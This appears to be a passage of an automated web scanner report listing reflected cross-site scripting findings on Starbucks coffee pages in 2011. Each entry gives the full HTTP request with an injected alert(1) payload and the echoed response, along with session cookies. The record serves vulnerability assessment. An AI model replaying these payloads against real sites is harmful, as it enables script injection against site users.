2.23. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1ba"style%3d"x%3aexpression(alert(1))"2e68e935a83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be1ba"style="x:expression(alert(1))"2e68e935a83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee?be1ba"style%3d"x%3aexpression(alert(1))"2e68e935a83=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:15 GMT
Connection: close
Content-Length: 56088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee?be1ba"style="x:expression(alert(1))"2e68e935a83=1" />
...[SNIP]...

2.24. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25c37"%3balert(1)//2d0969caa59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25c37";alert(1)//2d0969caa59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee?25c37"%3balert(1)//2d0969caa59=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:09:19 GMT
Connection: close
Content-Length: 55993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
type="text/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "89759525001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee?25c37";alert(1)//2d0969caa59=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.25. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14736"style%3d"x%3aexpression(alert(1))"c3b68698284 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 14736"style="x:expression(alert(1))"c3b68698284 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn?14736"style%3d"x%3aexpression(alert(1))"c3b68698284=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:36 GMT
Connection: close
Content-Length: 37684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn?14736"style="x:expression(alert(1))"c3b68698284=1" />
...[SNIP]...

2.26. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/clover

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29816"style%3d"x%3aexpression(alert(1))"6d1aa7d73d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29816"style="x:expression(alert(1))"6d1aa7d73d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/clover?29816"style%3d"x%3aexpression(alert(1))"6d1aa7d73d1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:45 GMT
Connection: close
Content-Length: 39129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/clover?29816"style="x:expression(alert(1))"6d1aa7d73d1=1" />
...[SNIP]...

2.27. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/learn/flavors-in-your-cup

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f3b"style%3d"x%3aexpression(alert(1))"df67647ac4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70f3b"style="x:expression(alert(1))"df67647ac4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/learn/flavors-in-your-cup?70f3b"style%3d"x%3aexpression(alert(1))"df67647ac4c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:57 GMT
Connection: close
Content-Length: 43949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/learn/flavors-in-your-cup?70f3b"style="x:expression(alert(1))"df67647ac4c=1" />
...[SNIP]...

2.28. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1318e"style%3d"x%3aexpression(alert(1))"b348d971bc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1318e"style="x:expression(alert(1))"b348d971bc6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions?1318e"style%3d"x%3aexpression(alert(1))"b348d971bc6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:18:27 GMT
Connection: close
Content-Length: 50682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions?1318e"style="x:expression(alert(1))"b348d971bc6=1" />
...[SNIP]...

2.29. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/caramel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db288"style%3d"x%3aexpression(alert(1))"ffbed84d709 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db288"style="x:expression(alert(1))"ffbed84d709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/caramel?db288"style%3d"x%3aexpression(alert(1))"ffbed84d709=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:45 GMT
Connection: close
Content-Length: 41422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel?db288"style="x:expression(alert(1))"ffbed84d709=1" />
...[SNIP]...

2.30. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/cinnamon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e89"style%3d"x%3aexpression(alert(1))"ef92fe52f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68e89"style="x:expression(alert(1))"ef92fe52f9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/cinnamon?68e89"style%3d"x%3aexpression(alert(1))"ef92fe52f9f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:24 GMT
Connection: close
Content-Length: 41464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon?68e89"style="x:expression(alert(1))"ef92fe52f9f=1" />
...[SNIP]...

2.31. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/savoring

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4203"style%3d"x%3aexpression(alert(1))"93ec1632d62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4203"style="x:expression(alert(1))"93ec1632d62 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/savoring?d4203"style%3d"x%3aexpression(alert(1))"93ec1632d62=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:20:25 GMT
Connection: close
Content-Length: 40201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring?d4203"style="x:expression(alert(1))"93ec1632d62=1" />
...[SNIP]...

2.32. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-natural-fusions/vanilla

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd5c"style%3d"x%3aexpression(alert(1))"93089c0b9ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fd5c"style="x:expression(alert(1))"93089c0b9ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-natural-fusions/vanilla?4fd5c"style%3d"x%3aexpression(alert(1))"93089c0b9ff=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:19:06 GMT
Connection: close
Content-Length: 41391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla?4fd5c"style="x:expression(alert(1))"93089c0b9ff=1" />
...[SNIP]...

2.33. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d779"style%3d"x%3aexpression(alert(1))"13c0978d7ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d779"style="x:expression(alert(1))"13c0978d7ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee?2d779"style%3d"x%3aexpression(alert(1))"13c0978d7ed=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:24 GMT
Connection: close
Content-Length: 56951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee?2d779"style="x:expression(alert(1))"13c0978d7ed=1" />
...[SNIP]...

2.34. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48c38"style%3d"x%3aexpression(alert(1))"f99dc12b612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48c38"style="x:expression(alert(1))"f99dc12b612 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?48c38"style%3d"x%3aexpression(alert(1))"f99dc12b612=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:42 GMT
Connection: close
Content-Length: 42379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?48c38"style="x:expression(alert(1))"f99dc12b612=1" />
...[SNIP]...

2.35. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76daa"%3balert(1)//724980535d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76daa";alert(1)//724980535d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?76daa"%3balert(1)//724980535d7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:44 GMT
Connection: close
Content-Length: 42284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
shvars.playerType = "reserve";
       flashvars.playlistID = "624827690001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?76daa";alert(1)//724980535d7=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.36. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcf0f"style%3d"x%3aexpression(alert(1))"ad29da1d3f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bcf0f"style="x:expression(alert(1))"ad29da1d3f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?bcf0f"style%3d"x%3aexpression(alert(1))"ad29da1d3f1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:18:01 GMT
Connection: close
Content-Length: 41036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?bcf0f"style="x:expression(alert(1))"ad29da1d3f1=1" />
...[SNIP]...

